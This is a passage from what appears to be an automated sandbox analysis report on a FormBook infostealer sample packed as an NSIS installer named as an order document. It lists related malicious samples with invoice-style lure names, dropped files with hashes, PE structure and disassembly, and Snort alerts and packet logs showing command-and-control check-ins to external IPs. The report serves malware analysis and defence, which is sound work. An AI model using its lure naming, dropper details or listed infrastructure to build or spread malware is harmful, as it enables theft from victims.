                                                                • 154.220.38.217
                                                                Failure Notice Details PDF.exeGet hashmaliciousBrowse
                                                                • 160.124.142.50
                                                                PO#270521.pdf.exeGet hashmaliciousBrowse
                                                                • 154.213.230.241
                                                                ORDER LIST.pdf.exeGet hashmaliciousBrowse
                                                                • 185.51.167.23
                                                                pago sunat 250521.exeGet hashmaliciousBrowse
                                                                • 83.150.226.209
                                                                Consignment Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                • 154.86.39.23
                                                                xhbUdeAoVP.exeGet hashmaliciousBrowse
                                                                • 160.124.11.194
                                                                Purchase Inquiry&Product Specification.exeGet hashmaliciousBrowse
                                                                • 154.86.39.23
                                                                New Order_PO 1164_HD-F 4020 6K.exeGet hashmaliciousBrowse
                                                                • 154.92.68.17
                                                                f268bad6_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                • 160.124.137.188
                                                                RFQ - 001.xlsxGet hashmaliciousBrowse
                                                                • 160.124.11.194
                                                                vZMIGFMR.exeGet hashmaliciousBrowse
                                                                • 154.201.247.101
                                                                UNIFIEDLAYER-AS-1USaudit-528010081.xlsbGet hashmaliciousBrowse
                                                                • 192.185.33.154
                                                                Purchase_Order.exeGet hashmaliciousBrowse
                                                                • 162.241.253.69
                                                                audit-1133808478.xlsbGet hashmaliciousBrowse
                                                                • 192.185.33.154
                                                                my_attach_82862.xlsbGet hashmaliciousBrowse
                                                                • 50.87.220.158
                                                                Fax_Doc#01_5.htmlGet hashmaliciousBrowse
                                                                • 162.241.7.171
                                                                WcCEh3daIE.xlsGet hashmaliciousBrowse
                                                                • 162.241.77.193
                                                                KCTC International Ltd.exeGet hashmaliciousBrowse
                                                                • 192.254.185.244
                                                                lTAPQJikGw.exeGet hashmaliciousBrowse
                                                                • 74.220.199.8
                                                                supply us this product.exeGet hashmaliciousBrowse
                                                                • 50.87.146.199
                                                                #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                                • 192.185.74.169
                                                                3arZKnr21W.exeGet hashmaliciousBrowse
                                                                • 192.254.235.195
                                                                6b6zVfqxbk.xlsbGet hashmaliciousBrowse
                                                                • 216.172.184.23
                                                                HM-20210428 HBL.exeGet hashmaliciousBrowse
                                                                • 192.254.180.165
                                                                INQUIRY. ZIP.exeGet hashmaliciousBrowse
                                                                • 50.87.190.227
                                                                audit-78958169.xlsbGet hashmaliciousBrowse
                                                                • 192.185.113.120
                                                                research-1315978726.xlsbGet hashmaliciousBrowse
                                                                • 216.172.184.23
                                                                ExHNIXd73f.exeGet hashmaliciousBrowse
                                                                • 108.167.142.232
                                                                research-2012220787.xlsbGet hashmaliciousBrowse
                                                                • 216.172.184.23
                                                                research-2012220787.xlsbGet hashmaliciousBrowse
                                                                • 216.172.184.23
                                                                viVrtGR9Wg.xlsbGet hashmaliciousBrowse
                                                                • 192.185.113.120
                                                                ON-LINE-DATAServerlocation-NetherlandsDrontenNL1720e03faab70e324d64b586f3ddbdb1a48169dd54d3e.exeGet hashmaliciousBrowse
                                                                • 45.14.14.238
                                                                FreeDiscordNitro.exeGet hashmaliciousBrowse
                                                                • 45.81.227.32
                                                                FreeDiscordNitro.exeGet hashmaliciousBrowse
                                                                • 45.81.227.32
                                                                pXyRNISmvE.exeGet hashmaliciousBrowse
                                                                • 185.203.242.238
                                                                ZCWx5ganpD.exeGet hashmaliciousBrowse
                                                                • 45.81.227.32
                                                                26DLLM5eLv.exeGet hashmaliciousBrowse
                                                                • 45.81.227.32
                                                                1.exe.exeGet hashmaliciousBrowse
                                                                • 185.231.68.230
                                                                0442.pdf.exeGet hashmaliciousBrowse
                                                                • 185.231.68.230
                                                                68avRiNoDd.exeGet hashmaliciousBrowse
                                                                • 185.250.204.130
                                                                ONCK3z5a0Y.exeGet hashmaliciousBrowse
                                                                • 185.250.204.130
                                                                Sbb4QCilrT.exeGet hashmaliciousBrowse
                                                                • 185.250.204.130
                                                                tes.exeGet hashmaliciousBrowse
                                                                • 45.87.0.187
                                                                3333.pdf.exeGet hashmaliciousBrowse
                                                                • 185.231.68.230
                                                                UqosRB5jzG.exeGet hashmaliciousBrowse
                                                                • 45.81.227.32
                                                                oS41hmjrxS.exeGet hashmaliciousBrowse
                                                                • 185.203.242.238
                                                                q3LQr3Aqlk.exeGet hashmaliciousBrowse
                                                                • 176.57.68.60
                                                                Uc18q04nYe.exeGet hashmaliciousBrowse
                                                                • 212.86.114.14
                                                                P748jZ2XlY.exeGet hashmaliciousBrowse
                                                                • 212.86.114.14
                                                                uAC5ja2ZtD.exeGet hashmaliciousBrowse
                                                                • 212.86.114.14
                                                                ehbLUKWH81.exeGet hashmaliciousBrowse
                                                                • 212.86.114.14

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                C:\Users\user\AppData\Local\Temp\nsq144C.tmp\System.dllDHL Original Receipt_pdf.exeGet hashmaliciousBrowse
                                                                  HALKBANK - Dekont_pdf.exeGet hashmaliciousBrowse
                                                                    Quote-TSL-1037174_4810.exeGet hashmaliciousBrowse
                                                                      SX365783909782021.exeGet hashmaliciousBrowse
                                                                        moq fob order.exeGet hashmaliciousBrowse
                                                                          0900000000000090000.exeGet hashmaliciousBrowse
                                                                            444890321.exeGet hashmaliciousBrowse
                                                                              Packing-List_00930039.exeGet hashmaliciousBrowse
                                                                                2435.exeGet hashmaliciousBrowse
                                                                                  INVOICE.exeGet hashmaliciousBrowse
                                                                                    Shipment Invoice & Consignment Notification.exeGet hashmaliciousBrowse
                                                                                      KY4cmAI0jU.exeGet hashmaliciousBrowse
                                                                                        5t2CmTUhKc.exeGet hashmaliciousBrowse
                                                                                          8qdfmqz1PN.exeGet hashmaliciousBrowse
                                                                                            New Order PO2193570O1.docGet hashmaliciousBrowse
                                                                                              L2.xlsxGet hashmaliciousBrowse
                                                                                                Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxGet hashmaliciousBrowse
                                                                                                  New Order PO2193570O1.pdf.exeGet hashmaliciousBrowse
                                                                                                    2320900000000.exeGet hashmaliciousBrowse
                                                                                                      CshpH9OSkc.exeGet hashmaliciousBrowse

                                                                                                        Created / dropped Files

                                                                                                        C:\Users\user\AppData\Local\Temp\97ar2a6qp8y
                                                                                                        Process:C:\Users\user\Desktop\OrderKLB210568.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):164352
                                                                                                        Entropy (8bit):7.998966997007402
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:3072:5Q1/1OcNUEcQdPAth21syaYbdpWMFLKmUQXDB2c8LanoiETFK/5lb4Bj:2h1tKodIZQ0MwmUQ92tLayS0j
                                                                                                        MD5:3117019DF630EF72A86FB83EFD0E60E3
                                                                                                        SHA1:05E271A8CECC602EDA23BF77783A3A8C49DB9D3A
                                                                                                        SHA-256:A79527C569D24B161E9A7E2830B50C16C7F4712D9281539ED650FCEB8341186E
                                                                                                        SHA-512:5B5249F92E10AD0173CD3DE1CBB1B37A0C6CB7E6F27C26BF3E876183F997EAA0AC189E9FF310BFA60ABCE4D0B50691B74F6DC57AD332CD415F6B6E9AEDB7FD67
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview: M.$.e...5.....X.M....../9.n..j.Nxzm.+.c.3d......B..4..1l....9=..>...H.@..K...+T.w*.g_....gVcs...p..g.....!.;h..d=N.!.ca..a}.....5..w...M?.^.z..U>b....`....A.n..%7.~.0..K.l.....iEr.....R.L*.m2..UA.w.x.H.Dp\-.z....gZ.Jx......%s3......b...Y+.2`..}.y7.!'...8.3^,5...5}^....e|P7.cE..w......]f............F.).......DB.Mo.B...<g.S......Qj..<.d.....9E2U..}...<FW...?)..a.o{6.]\bW.......c..~.@.i.x0....?...ttq.$.......s....o..X^...)..:v.,,Gf.#Q..MY...."qq.S.K....J.....(.d.V. .......2.&O.c.'P.n0J.......4....z..E=V.$..~...e..N(.hVs..=.u.t...Nc..!..`..h..L.T.<y.fk............q^..SNe...|.\.h.)[.4...r....q-..p.YX..p.>Q..t,#..z.h}.Z^H.[.@.T.b...].-.4.Hr..1S0..#..g.1.H/..N...../.I.B..Y.............3.."....g.A...R6...'C..B...vI_.d.....T.....)....8!P3./.F...n......@/.(.U..8LD.......2t...."r....!..%h'.V...7.Y.6!m.m.P....*.b2.O..O.........d..Cf.st......G..r#.....]...PL..I ...._j%..n....75.j5...d..../.J......$+..{z......I..{..;9.8....l1...I....V.........Y..i)..
                                                                                                        C:\Users\user\AppData\Local\Temp\nsq144B.tmp
                                                                                                        Process:C:\Users\user\Desktop\OrderKLB210568.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):261932
                                                                                                        Entropy (8bit):7.335808834866171
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:D5h1tKodIZQ0MwmUQ92tLayS0kq+1ils6ret:Nh1tKatwlhBkB8r2
                                                                                                        MD5:075CA91D3D62161BD11E5BDCF4BC2A79
                                                                                                        SHA1:B583029D9E0B34A1EF2BB2114CD0837FE2B5A09D
                                                                                                        SHA-256:FDE031AD773323B555B0740A337DFAC0E8DA4F2C22C4132BB46E20921C9FC271
                                                                                                        SHA-512:C870D7CDAC7D1392D09D2271976EF931CC982588BC0D19AA53FFCDB54213FE53C5F2697FB1CAC7F0742340BE2E18C791582161AF9D51C79378B5574FA830C59B
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview: .r......,........................V.......q.......r..............................................................2...........................................................................................................................................................................J...................j...........................................................................................................................................f...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Temp\nsq144C.tmp\System.dll
                                                                                                        Process:C:\Users\user\Desktop\OrderKLB210568.exe
                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11776
                                                                                                        Entropy (8bit):5.855045165595541
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                        MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                        SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                        SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                        SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                        Malicious:false
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: DHL Original Receipt_pdf.exe, Detection: malicious, Browse
                                                                                                        • Filename: HALKBANK - Dekont_pdf.exe, Detection: malicious, Browse
                                                                                                        • Filename: Quote-TSL-1037174_4810.exe, Detection: malicious, Browse
                                                                                                        • Filename: SX365783909782021.exe, Detection: malicious, Browse
                                                                                                        • Filename: moq fob order.exe, Detection: malicious, Browse
                                                                                                        • Filename: 0900000000000090000.exe, Detection: malicious, Browse
                                                                                                        • Filename: 444890321.exe, Detection: malicious, Browse
                                                                                                        • Filename: Packing-List_00930039.exe, Detection: malicious, Browse
                                                                                                        • Filename: 2435.exe, Detection: malicious, Browse
                                                                                                        • Filename: INVOICE.exe, Detection: malicious, Browse
                                                                                                        • Filename: Shipment Invoice & Consignment Notification.exe, Detection: malicious, Browse
                                                                                                        • Filename: KY4cmAI0jU.exe, Detection: malicious, Browse
                                                                                                        • Filename: 5t2CmTUhKc.exe, Detection: malicious, Browse
                                                                                                        • Filename: 8qdfmqz1PN.exe, Detection: malicious, Browse
                                                                                                        • Filename: New Order PO2193570O1.doc, Detection: malicious, Browse
                                                                                                        • Filename: L2.xlsx, Detection: malicious, Browse
                                                                                                        • Filename: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx, Detection: malicious, Browse
                                                                                                        • Filename: New Order PO2193570O1.pdf.exe, Detection: malicious, Browse
                                                                                                        • Filename: 2320900000000.exe, Detection: malicious, Browse
                                                                                                        • Filename: CshpH9OSkc.exe, Detection: malicious, Browse
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Temp\zubtzccsdnrawj
                                                                                                        Process:C:\Users\user\Desktop\OrderKLB210568.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):56433
                                                                                                        Entropy (8bit):4.976785039058637
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:dC7v+wlDSox/dl2VOBVMcGfUVPhbPGNm7W/P7+1CSN:dq+1il2V6rVN1W/PECy
                                                                                                        MD5:4125C684CF787B77A40C21FF21919698
                                                                                                        SHA1:4776615370325C5A12BB055979DB2F25F7CF6430
                                                                                                        SHA-256:5D3D7430B01DBD725E66CE52F20D8AF74193DA6BA66901A27E7F8C6DEEC7FC1F
                                                                                                        SHA-512:EA3D6502BE7CB0DF88FA8E537308CC723B3B1C713FA168B354F3F59A921AA1B49F6FD6E5F4ADB8E2A946C1C4611832BE4DDAFAD270A13D6147260BA35F5BBC14
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview: U......3....h...l.i.....j.....k.....l.....m.....n.....o.....p.....q.....r...5.s.....t.....u.....v.....w.....x.....y.....z...2.{.....|.....}.....~...........................x.........................................x.................x.........................................G...........x...................................x...........Q...........x.................x...........y...........x.............................x...........u...................................1.............................x.........................................G...........x...................................x...........Q...........x.................x...........y...........x.............................x...........9.................................................................x.........................................G...........x...................................x......

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                        Entropy (8bit):7.910495155049787
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                        • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:OrderKLB210568.exe
                                                                                                        File size:221568
                                                                                                        MD5:759b0d51f128f54e516ad1941a896d77
                                                                                                        SHA1:13e8d9d44cf15bcfc43952eebc3f10fcafed23a3
                                                                                                        SHA256:a08bf89a7e4c15fb33684e268199df85727a6ab759a1d7f3d5ba2b7a0e49f17a
                                                                                                        SHA512:216cd9f75609990103b52793e8e34a7e4af69d546523dd13def7314082d9454b1fcbef7c89004d2b6fff0662d25187fe8f3fd043df2798b5acfd86fea744d654
                                                                                                        SSDEEP:6144:Ds9S8uq8rbsONjyPS4cebFLeingaqlN1oENmejm:yyqmb+Zzngrd4
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

                                                                                                        File Icon

                                                                                                        Icon Hash:b2a88c96b2ca6a72

                                                                                                        Static PE Info

                                                                                                        General

                                                                                                        Entrypoint:0x40323c
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:4
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:4
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:4
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:099c0646ea7282d232219f8807883be0

                                                                                                        Entrypoint Preview

                                                                                                        Instruction
                                                                                                        sub esp, 00000180h
                                                                                                        push ebx
                                                                                                        push ebp
                                                                                                        push esi
                                                                                                        xor ebx, ebx
                                                                                                        push edi
                                                                                                        mov dword ptr [esp+18h], ebx
                                                                                                        mov dword ptr [esp+10h], 00409130h
                                                                                                        xor esi, esi
                                                                                                        mov byte ptr [esp+14h], 00000020h
                                                                                                        call dword ptr [00407030h]
                                                                                                        push 00008001h
                                                                                                        call dword ptr [004070B4h]
                                                                                                        push ebx
                                                                                                        call dword ptr [0040727Ch]
                                                                                                        push 00000008h
                                                                                                        mov dword ptr [00423F58h], eax
                                                                                                        call 00007FBE6C3531FEh
                                                                                                        mov dword ptr [00423EA4h], eax
                                                                                                        push ebx
                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                        push 00000160h
                                                                                                        push eax
                                                                                                        push ebx
                                                                                                        push 0041F458h
                                                                                                        call dword ptr [00407158h]
                                                                                                        push 004091B8h
                                                                                                        push 004236A0h
                                                                                                        call 00007FBE6C352EB1h
                                                                                                        call dword ptr [004070B0h]
                                                                                                        mov edi, 00429000h
                                                                                                        push eax
                                                                                                        push edi
                                                                                                        call 00007FBE6C352E9Fh
                                                                                                        push ebx
                                                                                                        call dword ptr [0040710Ch]
                                                                                                        cmp byte ptr [00429000h], 00000022h
                                                                                                        mov dword ptr [00423EA0h], eax
                                                                                                        mov eax, edi
                                                                                                        jne 00007FBE6C3505FCh
                                                                                                        mov byte ptr [esp+14h], 00000022h
                                                                                                        mov eax, 00429001h
                                                                                                        push dword ptr [esp+14h]
                                                                                                        push eax
                                                                                                        call 00007FBE6C352992h
                                                                                                        push eax
                                                                                                        call dword ptr [0040721Ch]
                                                                                                        mov dword ptr [esp+1Ch], eax
                                                                                                        jmp 00007FBE6C350655h
                                                                                                        cmp cl, 00000020h
                                                                                                        jne 00007FBE6C3505F8h
                                                                                                        inc eax
                                                                                                        cmp byte ptr [eax], 00000020h
                                                                                                        je 00007FBE6C3505ECh
                                                                                                        cmp byte ptr [eax], 00000022h
                                                                                                        mov byte ptr [eax+eax+00h], 00000000h

                                                                                                        Rich Headers

                                                                                                        Programming Language:
                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                        Data Directories

                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x9e0.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                        Sections

                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                        .rdata0x70000x11900x1200False0.4453125data5.18162709925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                        .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .rsrc0x2c0000x9e00xa00False0.45625data4.51012867721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                        Resources

                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                        RT_ICON0x2c1900x2e8dataEnglishUnited States
                                                                                                        RT_DIALOG0x2c4780x100dataEnglishUnited States
                                                                                                        RT_DIALOG0x2c5780x11cdataEnglishUnited States
                                                                                                        RT_DIALOG0x2c6980x60dataEnglishUnited States
                                                                                                        RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                                                                                                        RT_MANIFEST0x2c7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                        Imports

                                                                                                        DLLImport
                                                                                                        KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                                        USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                                        GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                                        SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                                        ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                        ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                        VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                        Possible Origin

                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                        EnglishUnited States

                                                                                                        Network Behavior

                                                                                                        Snort IDS Alerts

                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                        06/11/21-15:43:22.045766ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                                                                                        06/11/21-15:43:23.101997ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                                                                                        06/11/21-15:43:25.137748ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                                                                                        06/11/21-15:43:42.578503TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.474.208.236.54
                                                                                                        06/11/21-15:43:42.578503TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.474.208.236.54
                                                                                                        06/11/21-15:43:42.578503TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.474.208.236.54
                                                                                                        06/11/21-15:44:17.271176ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jun 11, 2021 15:43:31.385608912 CEST4976780192.168.2.4162.144.21.92
                                                                                                        Jun 11, 2021 15:43:31.571829081 CEST8049767162.144.21.92192.168.2.4
                                                                                                        Jun 11, 2021 15:43:31.572001934 CEST4976780192.168.2.4162.144.21.92
                                                                                                        Jun 11, 2021 15:43:31.572282076 CEST4976780192.168.2.4162.144.21.92
                                                                                                        Jun 11, 2021 15:43:31.758203030 CEST8049767162.144.21.92192.168.2.4
                                                                                                        Jun 11, 2021 15:43:32.045828104 CEST8049767162.144.21.92192.168.2.4
                                                                                                        Jun 11, 2021 15:43:32.046176910 CEST4976780192.168.2.4162.144.21.92
                                                                                                        Jun 11, 2021 15:43:32.060381889 CEST8049767162.144.21.92192.168.2.4
                                                                                                        Jun 11, 2021 15:43:32.060431957 CEST8049767162.144.21.92192.168.2.4
                                                                                                        Jun 11, 2021 15:43:32.060506105 CEST4976780192.168.2.4162.144.21.92
                                                                                                        Jun 11, 2021 15:43:32.060559034 CEST4976780192.168.2.4162.144.21.92
                                                                                                        Jun 11, 2021 15:43:32.232134104 CEST8049767162.144.21.92192.168.2.4
                                                                                                        Jun 11, 2021 15:43:32.232233047 CEST4976780192.168.2.4162.144.21.92
                                                                                                        Jun 11, 2021 15:43:37.141717911 CEST4976880192.168.2.435.246.6.109
                                                                                                        Jun 11, 2021 15:43:37.206684113 CEST804976835.246.6.109192.168.2.4
                                                                                                        Jun 11, 2021 15:43:37.206832886 CEST4976880192.168.2.435.246.6.109
                                                                                                        Jun 11, 2021 15:43:37.207093000 CEST4976880192.168.2.435.246.6.109
                                                                                                        Jun 11, 2021 15:43:37.271953106 CEST804976835.246.6.109192.168.2.4
                                                                                                        Jun 11, 2021 15:43:37.304081917 CEST804976835.246.6.109192.168.2.4
                                                                                                        Jun 11, 2021 15:43:37.304126978 CEST804976835.246.6.109192.168.2.4
                                                                                                        Jun 11, 2021 15:43:37.304244041 CEST4976880192.168.2.435.246.6.109
                                                                                                        Jun 11, 2021 15:43:37.304325104 CEST4976880192.168.2.435.246.6.109
                                                                                                        Jun 11, 2021 15:43:37.369246006 CEST804976835.246.6.109192.168.2.4
                                                                                                        Jun 11, 2021 15:43:42.416724920 CEST4976980192.168.2.474.208.236.54
                                                                                                        Jun 11, 2021 15:43:42.578226089 CEST804976974.208.236.54192.168.2.4
                                                                                                        Jun 11, 2021 15:43:42.578306913 CEST4976980192.168.2.474.208.236.54
                                                                                                        Jun 11, 2021 15:43:42.578502893 CEST4976980192.168.2.474.208.236.54
                                                                                                        Jun 11, 2021 15:43:42.739938021 CEST804976974.208.236.54192.168.2.4
                                                                                                        Jun 11, 2021 15:43:42.745291948 CEST804976974.208.236.54192.168.2.4
                                                                                                        Jun 11, 2021 15:43:42.745311975 CEST804976974.208.236.54192.168.2.4
                                                                                                        Jun 11, 2021 15:43:42.745323896 CEST804976974.208.236.54192.168.2.4
                                                                                                        Jun 11, 2021 15:43:42.745461941 CEST4976980192.168.2.474.208.236.54
                                                                                                        Jun 11, 2021 15:43:42.745528936 CEST4976980192.168.2.474.208.236.54
                                                                                                        Jun 11, 2021 15:43:42.906984091 CEST804976974.208.236.54192.168.2.4
                                                                                                        Jun 11, 2021 15:43:47.858846903 CEST4977080192.168.2.434.215.126.147
                                                                                                        Jun 11, 2021 15:43:48.066330910 CEST804977034.215.126.147192.168.2.4
                                                                                                        Jun 11, 2021 15:43:48.066440105 CEST4977080192.168.2.434.215.126.147
                                                                                                        Jun 11, 2021 15:43:48.066593885 CEST4977080192.168.2.434.215.126.147
                                                                                                        Jun 11, 2021 15:43:48.273890018 CEST804977034.215.126.147192.168.2.4
